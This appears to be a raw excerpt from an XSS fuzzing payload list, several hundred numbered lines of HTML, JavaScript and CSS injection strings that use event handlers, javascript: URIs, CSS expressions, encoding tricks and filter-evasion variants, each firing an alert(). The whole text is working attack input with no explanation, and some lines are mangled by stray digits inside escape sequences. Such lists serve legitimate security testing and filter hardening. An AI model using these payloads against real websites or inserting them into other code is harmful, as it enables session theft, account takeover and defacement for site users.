ABC<div style="x:expression\x5C(javascript:alert(1520)">DEF
ABC<div style="x:expression\x00(javascript:alert(1521)">DEF
ABC<div style="x:exp\x00ression(javascript:alert(1522)">DEF
ABC<div style="x:exp\x5Cression(javascript:alert(1523)">DEF
ABC<div style="x:\x0Aexpression(javascript:alert(1524)">DEF
ABC<div style="x:\x09expression(javascript:alert(1525)">DEF
ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1526)">DEF
ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1527)">DEF
ABC<div style="x:\xC2\xA0expression(javascript:alert(1528)">DEF
ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1529)">DEF
ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1530)">DEF
ABC<div style="x:\x0Dexpression(javascript:alert(1531)">DEF
ABC<div style="x:\x0Cexpression(javascript:alert(1532)">DEF
ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1533)">DEF
ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1534)">DEF
ABC<div style="x:\x20expression(javascript:alert(1535)">DEF
ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1536)">DEF
ABC<div style="x:\x00expression(javascript:alert(1537)">DEF
ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1538)">DEF
ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1539)">DEF
ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1540)">DEF
ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1541)">DEF
ABC<div style="x:\x0Bexpression(javascript:alert(1542)">DEF
ABC<div style="x:\xE2\x80\x81543expression(javascript:alert(1543)">DEF
ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1544)">DEF
ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1545)">DEF
<a href="\x0Bjavascript:javascript:alert(1546)" id="fuzzelement1546">test</a>
<a href="\x0Fjavascript:javascript:alert(1547)" id="fuzzelement1547">test</a>
<a href="\xC2\xA0javascript:javascript:alert(1548)" id="fuzzelement1548">test</a>
<a href="\x05javascript:javascript:alert(1549)" id="fuzzelement1549">test</a>
<a href="\xE1550\xA0\x8Ejavascript:javascript:alert(1550)" id="fuzzelement1550">test</a>
<a href="\x15518javascript:javascript:alert(1551)" id="fuzzelement1551">test</a>
<a href="\x15521552javascript:javascript:alert(1552)" id="fuzzelement1552">test</a>
<a href="\xE2\x80\x88javascript:javascript:alert(1553)" id="fuzzelement1553">test</a>
<a href="\xE2\x80\x89javascript:javascript:alert(1554)" id="fuzzelement1554">test</a>
<a href="\xE2\x80\x80javascript:javascript:alert(1555)" id="fuzzelement1555">test</a>
<a href="\x15567javascript:javascript:alert(1556)" id="fuzzelement1556">test</a>
<a href="\x03javascript:javascript:alert(1557)" id="fuzzelement1557">test</a>
<a href="\x0Ejavascript:javascript:alert(1558)" id="fuzzelement1558">test</a>
<a href="\x1559Ajavascript:javascript:alert(1559)" id="fuzzelement1559">test</a>
<a href="\x00javascript:javascript:alert(1560)" id="fuzzelement1560">test</a>
<a href="\x15610javascript:javascript:alert(1561)" id="fuzzelement1561">test</a>
<a href="\xE2\x80\x82javascript:javascript:alert(1562)" id="fuzzelement1562">test</a>
<a href="\x20javascript:javascript:alert(1563)" id="fuzzelement1563">test</a>
<a href="\x15643javascript:javascript:alert(1564)" id="fuzzelement1564">test</a>
<a href="\x09javascript:javascript:alert(1565)" id="fuzzelement1565">test</a>
<a href="\xE2\x80\x8Ajavascript:javascript:alert(1566)" id="fuzzelement1566">test</a>
<a href="\x15674javascript:javascript:alert(1567)" id="fuzzelement1567">test</a>
<a href="\x15689javascript:javascript:alert(1568)" id="fuzzelement1568">test</a>
<a href="\xE2\x80\xAFjavascript:javascript:alert(1569)" id="fuzzelement1569">test</a>
<a href="\x1570Fjavascript:javascript:alert(1570)" id="fuzzelement1570">test</a>
<a href="\xE2\x80\x81571javascript:javascript:alert(1571)" id="fuzzelement1571">test</a>
<a href="\x1572Djavascript:javascript:alert(1572)" id="fuzzelement1572">test</a>
<a href="\xE2\x80\x87javascript:javascript:alert(1573)" id="fuzzelement1573">test</a>
<a href="\x07javascript:javascript:alert(1574)" id="fuzzelement1574">test</a>
<a href="\xE1575\x9A\x80javascript:javascript:alert(1575)" id="fuzzelement1575">test</a>
<a href="\xE2\x80\x83javascript:javascript:alert(1576)" id="fuzzelement1576">test</a>
<a href="\x04javascript:javascript:alert(1577)" id="fuzzelement1577">test</a>
<a href="\x01578javascript:javascript:alert(1578)" id="fuzzelement1578">test</a>
<a href="\x08javascript:javascript:alert(1579)" id="fuzzelement1579">test</a>
<a href="\xE2\x80\x84javascript:javascript:alert(1580)" id="fuzzelement1580">test</a>
<a href="\xE2\x80\x86javascript:javascript:alert(1581)" id="fuzzelement1581">test</a>
<a href="\xE3\x80\x80javascript:javascript:alert(1582)" id="fuzzelement1582">test</a>
<a href="\x15832javascript:javascript:alert(1583)" id="fuzzelement1583">test</a>
<a href="\x0Djavascript:javascript:alert(1584)" id="fuzzelement1584">test</a>
<a href="\x0Ajavascript:javascript:alert(1585)" id="fuzzelement1585">test</a>
<a href="\x0Cjavascript:javascript:alert(1586)" id="fuzzelement1586">test</a>
<a href="\x15875javascript:javascript:alert(1587)" id="fuzzelement1587">test</a>
<a href="\xE2\x80\xA8javascript:javascript:alert(1588)" id="fuzzelement1588">test</a>
<a href="\x15896javascript:javascript:alert(1589)" id="fuzzelement1589">test</a>
<a href="\x02javascript:javascript:alert(1590)" id="fuzzelement1590">test</a>
<a href="\x1591Bjavascript:javascript:alert(1591)" id="fuzzelement1591">test</a>
<a href="\x06javascript:javascript:alert(1592)" id="fuzzelement1592">test</a>
<a href="\xE2\x80\xA9javascript:javascript:alert(1593)" id="fuzzelement1593">test</a>
<a href="\xE2\x80\x85javascript:javascript:alert(1594)" id="fuzzelement1594">test</a>
<a href="\x1595Ejavascript:javascript:alert(1595)" id="fuzzelement1595">test</a>
<a href="\xE2\x81596\x9Fjavascript:javascript:alert(1596)" id="fuzzelement1596">test</a>
<a href="\x1597Cjavascript:javascript:alert(1597)" id="fuzzelement1597">test</a>
<a href="javascript\x00:javascript:alert(1598)" id="fuzzelement1598">test</a>
<a href="javascript\x3A:javascript:alert(1599)" id="fuzzelement1599">test</a>
<a href="javascript\x09:javascript:alert(1600)" id="fuzzelement1600">test</a>
<a href="javascript\x0D:javascript:alert(1601)" id="fuzzelement1601">test</a>
<a href="javascript\x0A:javascript:alert(1602)" id="fuzzelement1602">test</a>
`"'><img src=xxx:x \x0Aοnerrοr=javascript:alert(1603)>
`"'><img src=xxx:x \x22οnerrοr=javascript:alert(1604)>
`"'><img src=xxx:x \x0Bοnerrοr=javascript:alert(1605)>
`"'><img src=xxx:x \x0Dοnerrοr=javascript:alert(1606)>
`"'><img src=xxx:x \x2Fοnerrοr=javascript:alert(1607)>
`"'><img src=xxx:x \x09οnerrοr=javascript:alert(1608)>
`"'><img src=xxx:x \x0Cοnerrοr=javascript:alert(1609)>
`"'><img src=xxx:x \x00οnerrοr=javascript:alert(1610)>
`"'><img src=xxx:x \x27οnerrοr=javascript:alert(1611)>
`"'><img src=xxx:x \x20οnerrοr=javascript:alert(1612)>
"`'><script>\x3Bjavascript:alert(1613)</script>
"`'><script>\x0Djavascript:alert(1614)</script>
"`'><script>\xEF\xBB\xBFjavascript:alert(1615)</script>
"`'><script>\xE2\x80\x81616javascript:alert(1616)</script>
"`'><script>\xE2\x80\x84javascript:alert(1617)</script>
"`'><script>\xE3\x80\x80javascript:alert(1618)</script>
"`'><script>\x09javascript:alert(1619)</script>
"`'><script>\xE2\x80\x89javascript:alert(1620)</script>
"`'><script>\xE2\x80\x85javascript:alert(1621)</script>
"`'><script>\xE2\x80\x88javascript:alert(1622)</script>
"`'><script>\x00javascript:alert(1623)</script>
"`'><script>\xE2\x80\xA8javascript:alert(1624)</script>
"`'><script>\xE2\x80\x8Ajavascript:alert(1625)</script>
"`'><script>\xE1626\x9A\x80javascript:alert(1626)</script>
"`'><script>\x0Cjavascript:alert(1627)</script>
"`'><script>\x2Bjavascript:alert(1628)</script>
"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1629)</script>
"`'><script>-javascript:alert(1630)</script>
"`'><script>\x0Ajavascript:alert(1631)</script>
"`'><script>\xE2\x80\xAFjavascript:alert(1632)</script>
"`'><script>\x7Ejavascript:alert(1633)</script>
"`'><script>\xE2\x80\x87javascript:alert(1634)</script>
"`'><script>\xE2\x81635\x9Fjavascript:alert(1635)</script>
"`'><script>\xE2\x80\xA9javascript:alert(1636)</script>
"`'><script>\xC2\x85javascript:alert(1637)</script>
"`'><script>\xEF\xBF\xAEjavascript:alert(1638)</script>
"`'><script>\xE2\x80\x83javascript:alert(1639)</script>
"`'><script>\xE2\x80\x8Bjavascript:alert(1640)</script>
"`'><script>\xEF\xBF\xBEjavascript:alert(1641)</script>
"`'><script>\xE2\x80\x80javascript:alert(1642)</script>
"`'><script>\x21643javascript:alert(1643)</script>
"`'><script>\xE2\x80\x82javascript:alert(1644)</script>
"`'><script>\xE2\x80\x86javascript:alert(1645)</script>
"`'><script>\xE1646\xA0\x8Ejavascript:alert(1646)</script>
"`'><script>\x0Bjavascript:alert(1647)</script>
"`'><script>\x20javascript:alert(1648)</script>
"`'><script>\xC2\xA0javascript:alert(1649)</script>
"/><img/οnerrοr=\x0Bjavascript:alert(1650)\x0Bsrc=xxx:x />
"/><img/οnerrοr=\x22javascript:alert(1651)\x22src=xxx:x />
"/><img/οnerrοr=\x09javascript:alert(1652)\x09src=xxx:x />
"/><img/οnerrοr=\x27javascript:alert(1653)\x27src=xxx:x />
"/><img/οnerrοr=\x0Ajavascript:alert(1654)\x0Asrc=xxx:x />
"/><img/οnerrοr=\x0Cjavascript:alert(1655)\x0Csrc=xxx:x />
"/><img/οnerrοr=\x0Djavascript:alert(1656)\x0Dsrc=xxx:x />
"/><img/οnerrοr=\x60javascript:alert(1657)\x60src=xxx:x />
"/><img/οnerrοr=\x20javascript:alert(1658)\x20src=xxx:x />
<script\x2F>javascript:alert(1659)</script>
<script\x20>javascript:alert(1660)</script>
<script\x0D>javascript:alert(1661)</script>
<script\x0A>javascript:alert(1662)</script>
<script\x0C>javascript:alert(1663)</script>
<script\x00>javascript:alert(1664)</script>
<script\x09>javascript:alert(1665)</script>
"><img src=x οnerrοr=javascript:alert(1666)>
"><img src=x οnerrοr=javascript:alert(1667)>
"><img src=x οnerrοr=javascript:alert(1668)>
"><img src=x οnerrοr=javascript:alert(1669)>
"><img src=x οnerrοr=javascript:alert(1670))>
"><img src=x οnerrοr=javascript:alert(1671))>
"><img src=x οnerrοr=javascript:alert(1672))>
"><img src=x οnerrοr=javascript:alert(1673)>
"><img src=x οnerrοr=javascript:alert(1674))>
"><img src=x οnerrοr=javascript:alert(1675))>
"><img src=x οnerrοr=javascript:alert(1676)>
"><img src=x οnerrοr=javascript:alert(1677))>
"><img src=x οnerrοr=javascript:alert(1678)>
"><img src=x οnerrοr=javascript:alert(1679))>
"><img src=x οnerrοr=javascript:alert(1680)>
`"'><img src=xxx:x onerror\x0B=javascript:alert(1681)>
`"'><img src=xxx:x onerror\x00=javascript:alert(1682)>
`"'><img src=xxx:x onerror\x0C=javascript:alert(1683)>
`"'><img src=xxx:x onerror\x0D=javascript:alert(1684)>
`"'><img src=xxx:x onerror\x20=javascript:alert(1685)>
`"'><img src=xxx:x onerror\x0A=javascript:alert(1686)>
`"'><img src=xxx:x onerror\x09=javascript:alert(1687)>
<script>javascript:alert(1688)<\x00/script>
<img src=# onerror\x3D"javascript:alert(1689)" >
<input οnfοcus=javascript:alert(1690) autofocus>
<input οnblur=javascript:alert(1691) autofocus><input autofocus>
<video poster=javascript:javascript:alert(1692)//
<body οnscrοll=javascript:alert(1693)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<form id=test onforminput=javascript:alert(1694)><input></form><button form=test onformchange=javascript:alert(1694)>X
<video><source οnerrοr="javascript:javascript:alert(1695)">
<video οnerrοr="javascript:javascript:alert(1696)"><source>
<form><button formaction="javascript:javascript:alert(1697)">X
<body οninput=javascript:alert(1698)><input autofocus>
<math href="javascript:javascript:alert(1699)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1699)">CLICKME</maction> </math>
<frameset οnlοad=javascript:alert(1700)>
<table background="javascript:javascript:alert(1701)">
<!--<img src="--><img src=x οnerrοr=javascript:alert(1702)//">
<comment><img src="</comment><img src=x οnerrοr=javascript:alert(1703))//">
<![><img src="]><img src=x οnerrοr=javascript:alert(1704)//">
<style><img src="</style><img src=x οnerrοr=javascript:alert(1705)//">
<li style=list-style:url() οnerrοr=javascript:alert(1706)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden οnlοad=javascript:alert(1706)></div>
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1707)//#">XXX</a></body>
<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1708)</SCRIPT>
<OBJECT CLASSID="clsid:333C7BC4-460F-17091709D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1709)"></OBJECT>
<b <script>alert(1712)</script>0
<div id="div1713"><input value="``οnmοuseοver=javascript:alert(1713)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1713").innerHTML;</script>
<x '="foo"><x foo='><img src=x οnerrοr=javascript:alert(1714)//'>
<embed src="javascript:alert(1715)">
<img src="javascript:alert(1716)">
<image src="javascript:alert(1717)">
<script src="javascript:alert(1718)">
<div style=width:1719px;filter:glow onfilterchange=javascript:alert(1719)>x
<? foo="><script>javascript:alert(1720)</script>">
<! foo="><script>javascript:alert(1721)</script>">
</ foo="><script>javascript:alert(1722)</script>">
<? foo="><x foo='?><script>javascript:alert(1723)</script>'>">
<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1724)</script>">
<% foo><x foo="%><script>javascript:alert(1725)</script>">
<div id=d><x xmlns="><iframe οnlοad=javascript:alert(1726)"></div> <script>d.innerHTML=d.innerHTML</script>
<img \x00src=x οnerrοr="alert(1727)">
<img \x47src=x οnerrοr="javascript:alert(1728)">
<img \x17291729src=x οnerrοr="javascript:alert(1729)">
<img \x17302src=x οnerrοr="javascript:alert(1730)">
<img\x47src=x οnerrοr="javascript:alert(1731)">
<img\x17320src=x οnerrοr="javascript:alert(1732)">
<img\x17333src=x οnerrοr="javascript:alert(1733)">
<img\x32src=x οnerrοr="javascript:alert(1734)">
<img\x47src=x οnerrοr="javascript:alert(1735)">
<img\x17361736src=x οnerrοr="javascript:alert(1736)">
<img \x47src=x οnerrοr="javascript:alert(1737)">
<img \x34src=x οnerrοr="javascript:alert(1738)">
<img \x39src=x οnerrοr="javascript:alert(1739)">
<img \x00src=x οnerrοr="javascript:alert(1740)">
<img src\x09=x οnerrοr="javascript:alert(1741)">
<img src\x17420=x οnerrοr="javascript:alert(1742)">
<img src\x17433=x οnerrοr="javascript:alert(1743)">
<img src\x32=x οnerrοr="javascript:alert(1744)">
<img src\x17452=x οnerrοr="javascript:alert(1745)">
<img src\x17461746=x οnerrοr="javascript:alert(1746)">
<img src\x00=x οnerrοr="javascript:alert(1747)">
<img src\x47=x οnerrοr="javascript:alert(1748)">
<img src=x\x09οnerrοr="javascript:alert(1749)">
<img src=x\x17500οnerrοr="javascript:alert(1750)">
<img src=x\x17511751οnerrοr="javascript:alert(1751)">
<img src=x\x17522οnerrοr="javascript:alert(1752)">
<img src=x\x17533οnerrοr="javascript:alert(1753)">
<img[a][b][c]src[d]=x[e]οnerrοr=[f]"alert(1754)">
<img src=x οnerrοr=\x09"javascript:alert(1755)">
<img src=x οnerrοr=\x17560"javascript:alert(1756)">
<img src=x οnerrοr=\x17571757"javascript:alert(1757)">
<img src=x οnerrοr=\x17582"javascript:alert(1758)">
<img src=x οnerrοr=\x32"javascript:alert(1759)">
<img src=x οnerrοr=\x00"javascript:alert(1760)">
<a href=javaۡ�䓌script:javascript:alert(1761)>XXX</a>
<img src="x` `<script>javascript:alert(1762)</script>"` `>
<img src onerror /" '"= alt=javascript:alert(1763)//">
<title onpropertychange=javascript:alert(1764)></title><title title=>
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x οnerrοr=javascript:alert(1765)></a>">
<!--[if]><script>javascript:alert(1766)</script -->
<!--[if<img src=x οnerrοr=javascript:alert(1767)//]> -->
<object id="x" classid="clsid:CB927D17702-4FF7-4a9e-A177069-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17707-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1770)" style="behavior:url(#x);"><param name=postdomevents /></object>
<a style="-o-link:'javascript:javascript:alert(1771)';-o-link-source:current">X
<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1772)'}{}*{-o-link-source:current}]{color:red};</style>
<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1773))%7d
<style>@import "data:,*%7bx:expression(javascript:alert(1774))%7D";</style>
<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" οnclick="javascript:alert(1775);">XXX</a></a><a href="javascript:javascript:alert(1775)">XXX</a>
<// style=x:expression\28javascript:alert(1779)\29>
<style>*{x:expression(javascript:alert(1780))}</style>
<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1782));">X
<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1788)}}).$=eval</script>
<script>({0:#0=eval/#0#/#0#(javascript:alert(1789))})</script>
<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1790)}),x</script>
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1791)')()</script>
<meta charset="mac-farsi">¼script¾javascript:alert(1794)¼/script¾
X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1795)` >
1796<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh񁞖vior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"οnerrοr=javascript:alert(1796)>`>
1797<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."οnerrοr=javascript:alert(1797)>>
1799<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1799) strokecolor=white strokeweight=1799000px from=0 to=1799000 /></a>
<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1800)">XXX</a>
<event-source src="%(event)s" οnlοad="javascript:alert(1803)">
<a href="javascript:javascript:alert(1804)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">
<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<img�src=x:x�onerror�=javascript:alert(1805)>">
<script>javascript:alert(1809)</script>
<IMG SRC="javascript:javascript:alert(1810);">
<IMG SRC=javascript:javascript:alert(1811)>
<IMG SRC=`javascript:javascript:alert(1812)`>
<FRAMESET><FRAME SRC="javascript:javascript:alert(1814);"></FRAMESET>
<BODY ONLOAD=javascript:alert(1815)>
<BODY ONLOAD=javascript:javascript:alert(1816)>
<IMG SRC="jav ascript:javascript:alert(1817);">
<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1818)>
<IMG SRC="javascript:javascript:alert(1821)"
<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1823);">
<IMG DYNSRC="javascript:javascript:alert(1824)">
<IMG LOWSRC="javascript:javascript:alert(1825)">
<BGSOUND SRC="javascript:javascript:alert(1826);">
<BR SIZE="&{javascript:alert(1827)}">
<LINK REL="stylesheet" HREF="javascript:javascript:alert(1829);">
<STYLE>li {list-style-image: url("javascript:javascript:alert(1833)");}</STYLE><UL><LI>XSS
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1834);">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1835);">
<IFRAME SRC="javascript:javascript:alert(1836);"></IFRAME>
<TABLE BACKGROUND="javascript:javascript:alert(1837)">
<TABLE><TD BACKGROUND="javascript:javascript:alert(1838)">
<DIV STYLE="background-image: url(javascript:javascript:alert(1839))">
<DIV STYLE="width:expression(javascript:alert(1840));">
<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1841))">
<XSS STYLE="xss:expression(javascript:alert(1842))">
<STYLE TYPE="text/javascript">javascript:alert(1843);</STYLE>
<STYLE>.XSS{background-image:url("javascript:javascript:alert(1844)");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1845)")}</STYLE>
<!--[if gte IE 4]><SCRIPT>javascript:alert(1846);</SCRIPT><![endif]-->
<BASE HREF="javascript:javascript:alert(1847);//">
<OBJECT classid=clsid:ae24fdae-03c6-18491849d1849-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1849)></OBJECT>
<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:javascript:alert(1850)"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert(1851)</SCRIPT>"></BODY></HTML>
<form id="test" /><button form="test" formaction="javascript:javascript:alert(1854)">X
<body οnscrοll=javascript:alert(1855)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1856)">
<STYLE>a{background:url('s1858' 's2)}@import javascript:javascript:alert(1858);');}</STYLE>
<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1859)&&;&&<&&/script&&>
<SCRIPT onreadystatechange=javascript:javascript:alert(1860);></SCRIPT>
<style onreadystatechange=javascript:javascript:alert(1861);></style>
<?xml version="1862.0"?><html:html xmlns:html='http://www.w3.org/1862999/xhtml'><html:script>javascript:alert(1862);</html:script></html:html>
<embed code=javascript:javascript:alert(1864);></embed>
<frameset οnlοad=javascript:javascript:alert(1866)></frameset>
<object οnerrοr=javascript:javascript:alert(1867)>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1869);">]]</C><X></xml>
<IMG SRC=&{javascript:alert(1870);};>
<a href="javAascript:javascript:alert(1871)">test1871</a>
<a href="javaascript:javascript:alert(1872)">test1872</a>
<iframe srcdoc="<iframe/srcdoc=&lt;img/src=&apos;&apos;οnerrοr=javascript:alert(1874)&gt;>">
';alert(1875))//';alert(1875))//";
alert(1876))//";alert(1876))//--
></SCRIPT>">'><SCRIPT>alert(1877))</SCRIPT>
<IMG SRC="javascript:alert(1880);">
<IMG SRC=javascript:alert(1881)>
<IMG SRC=JaVaScRiPt:alert(1882)>
<IMG SRC=javascript:alert(1883)>
<IMG SRC=`javascript:alert(1884)`>
<a οnmοuseοver="alert(1885)">xxs link</a>
<a οnmοuseοver=alert(1886)>xxs link</a>
<IMG """><SCRIPT>alert(1887)</SCRIPT>">
<IMG SRC=javascript:alert(1888))>
<IMG SRC=# οnmοuseοver="alert(1889)">
<IMG SRC= οnmοuseοver="alert(1890)">
<IMG οnmοuseοver="alert(1891)">
<IMG SRC="jav ascript:alert(1895);">
<IMG SRC="jav ascript:alert(1896);">
<IMG SRC="jav
ascript:alert(1897);">
<IMG SRC="jav
ascript:alert(1898);">
perl -e 'print "<IMG SRC=java\0script:alert(1899)>";' > out
<IMG SRC="  javascript:alert(1900);">
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(1902)>
<<SCRIPT>alert(1904);//<</SCRIPT>
<IMG SRC="javascript:alert(1907)"
\";alert(1909);//
</TITLE><SCRIPT>alert(1910);</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert(1911);">
<BODY BACKGROUND="javascript:alert(1912)">
<IMG DYNSRC="javascript:alert(1913)">
<IMG LOWSRC="javascript:alert(1914)">
<STYLE>li {list-style-image: url("javascript:alert(1915)");}</STYLE><UL><LI>XSS</br>
<BODY ONLOAD=alert(1918)>
<BGSOUND SRC="javascript:alert(1919);">
<BR SIZE="&{alert(1920)}">
<LINK REL="stylesheet" HREF="javascript:alert(1921);">
<STYLE>@im\port'\ja\vasc\ript:alert(1926)';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert(1927))">
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert(1928))'>
<STYLE TYPE="text/javascript">alert(1929);</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert(1930)");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert(1931)")}</STYLE>
<STYLE type="text/css">BODY{background:url("javascript:alert(1932)")}</STYLE>
<XSS STYLE="xss:expression(alert(1933))">
¼script¾alert(1935)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(1936);">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(1938);">
<IFRAME SRC="javascript:alert(1939);"></IFRAME>
<IFRAME SRC=# οnmοuseοver="alert(1940)"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert(1941);"></FRAMESET>
<TABLE BACKGROUND="javascript:alert(1942)">
<TABLE><TD BACKGROUND="javascript:alert(1943)">
<DIV STYLE="background-image: url(javascript:alert(1944))">
<DIV STYLE="background-image: url(javascript:alert(1946))">
<DIV STYLE="width: expression(alert(1947));">
<BASE HREF="javascript:alert(1948);//">
<? echo('<SCR)';echo('IPT>alert(1953)</SCRIPT>'); ?>
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(1956)</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(1957);+ADw-/SCRIPT+AD4-
<img src=``
 οnerrοr=alert(1977)

<script /**/>/**/alert(1981)/**/</script /**/
<iframe/src="data:text/html,<svg ��load=alert(1983)>">
<meta content="
 1984 
; JAVASCRIPT: alert(1984)" http-equiv="refresh"/>
<form><iframe ䷐� src="javascript:alert(1992)"�䷐ ;>
http://www.google<script .com>alert(1994)</script
<script ^__^>alert(1998))</script ^__^
</style ><script :-(>/**/alert(1999)/**/</script :-(
�</form><input type"date" οnfοcus="alert(2000)">
<a href="javascript:void(0)" οnmοuseοver=
javascript:alert(2004)
>X</a>
<script ~~~>alert(2005)</script ~~~>
<iframe// src=javaSCRIPT:alert(2013)
<%<!--'%><script>alert(2030);</script -->
<script src="data:text/javascript,alert(2031)"></script>
<iframe/onreadystatechange=alert(2033)
<svg/οnlοad=alert(2034)
<input type="text" value=`` <div/οnmοuseοver='alert(2036)'>X</div>
<img src=`xx:xx`οnerrοr=alert(2038)>
<meta http-equiv="refresh" content="0;javascript:alert(2040)"/>
<script>+-+-2050-+-+alert(2050)</script>
<body/οnlοad=<!-->倞alert(2051)>
<script itworksinallbrowsers>/*<script* */alert(2052)</script
<img src ?itworksonchrome?\/onerror = alert(2053)
<svg><script onlypossibleinopera:-)> alert(2055)
<script x> alert(2057) </script 2057=2
<div/οnmοuseοver='alert(2058)'> style="x:">
<--`<img/src=` οnerrοr=alert(2059)> --!>
<div style="position:absolute;top:0;left:0;width:206100%;height:206100%" οnmοuseοver="prompt(2061)" οnclick="alert(2061)">x</button>
<form><button formaction=javascript:alert(2063)>CLICKME
<script>alert(2071);</script>
<script>alert(2072);</script>
<IMG SRC="javascript:alert(2073);">
<IMG SRC=javascript:alert(2074)>
<IMG SRC=javascript:alert(2075)>
<IMG SRC=javascript:alert(2076)>
<IMG """><SCRIPT>alert(2077)</SCRIPT>">
<scr<script>ipt>alert(2078);</scr</script>ipt>
<script>alert(2079))</script>
<img src=foo.png οnerrοr=alert(2080) />
<style>@im\port'\ja\vasc\ript:alert(2081)';</style>
<? echo('<scr)'; echo('ipt>alert(2082)</script>'); ?>
<marquee><script>alert(2083)</script></marquee>
<IMG SRC=\"jav ascript:alert(2084);\">
<IMG SRC=\"jav
ascript:alert(2085);\">
<IMG SRC=\"jav
ascript:alert(2086);\">
<IMG SRC=javascript:alert(2087))>
"><script>alert(2088)</script>
</title><script>alert(2090)</script>
</textarea><script>alert(2091)</script>
<IMG LOWSRC=\"javascript:alert(2092)\">
<IMG DYNSRC=\"javascript:alert(2093)\">
<font style='color:expression(alert(2094))'>
<img src="javascript:alert(2095)">
<script language="JavaScript">alert(2096)</script>
<body οnunlοad="javascript:alert(2097);">
<body onLoad="alert(2098);"
[color=red' οnmοuseοver="alert(2099)"]mouse over[/color]
"/></a></><img src=2100.gif οnerrοr=alert(2100)>
window.alert(2101);
alert(2103));'))">
<iframe<?php echo chr(11)?> οnlοad=alert(2104)></iframe>
"><script alert(2105))</script>
'">><script>alert(2107)</script>
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert(2109);\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert(2110);\">
<script>2111 2111 = 1; alert(2111)</script>
<STYLE type="text/css">BODY{background:url("javascript:alert(2112)")}</STYLE>
<?='<SCRIPT>alert(2113)</SCRIPT>'?>
" οnfοcus=alert(2115) "> <"
